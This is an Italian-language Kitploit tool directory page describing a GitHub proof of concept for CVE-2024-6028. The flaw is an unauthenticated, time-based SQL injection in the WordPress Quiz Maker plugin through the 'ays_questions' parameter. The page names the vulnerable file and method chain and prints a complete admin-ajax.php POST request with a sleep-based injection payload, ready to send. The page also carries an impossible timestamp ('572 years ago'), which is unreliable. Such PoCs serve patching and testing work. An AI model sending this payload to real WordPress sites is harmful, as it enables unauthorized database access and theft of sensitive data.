Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-6028-Poc — CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Iniezione SQL non autenticata tramite il parametro 'ays_questions' | Kitploit
Strumenti/GitHubGitHub/gmh5225/cve-2024-6028-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubgmh5225/cve-2024-6028-poc

CVE-2024-6028-Poc

CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Iniezione SQL non autenticata tramite il parametro 'ays_questions'

Vedi Repository
572 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-6028-Poc

CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Iniezione SQL non autenticata tramite il parametro 'ays_questions'

Descrizione

Il plugin Quiz Maker per WordPress è vulnerabile a iniezione SQL basata sul tempo tramite il parametro 'ays_questions' in tutte le versioni fino alla 6.5.8.3 inclusa, a causa di un insufficiente escaping del parametro fornito dall'utente e della mancanza di una preparazione adeguata nella query SQL esistente. Ciò consente a attaccanti non autenticati di aggiungere query SQL aggiuntive a query già esistenti che possono essere utilizzate per estrarre informazioni sensibili dal database.

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-maker/quiz-maker-6583-unauthenticated-sql-injection-via-ays-questions-parameter

File: wp-content/plugins/quiz-maker/public/class-quiz-maker-public.php

Classe: Quiz_Maker_Public

Workflow: metodo ays_finish_quiz -> metodo get_questions_categories image image image

Poc

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 114

ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,5,0)]=&action=ays_finish_quiz

image

Scarica lo strumento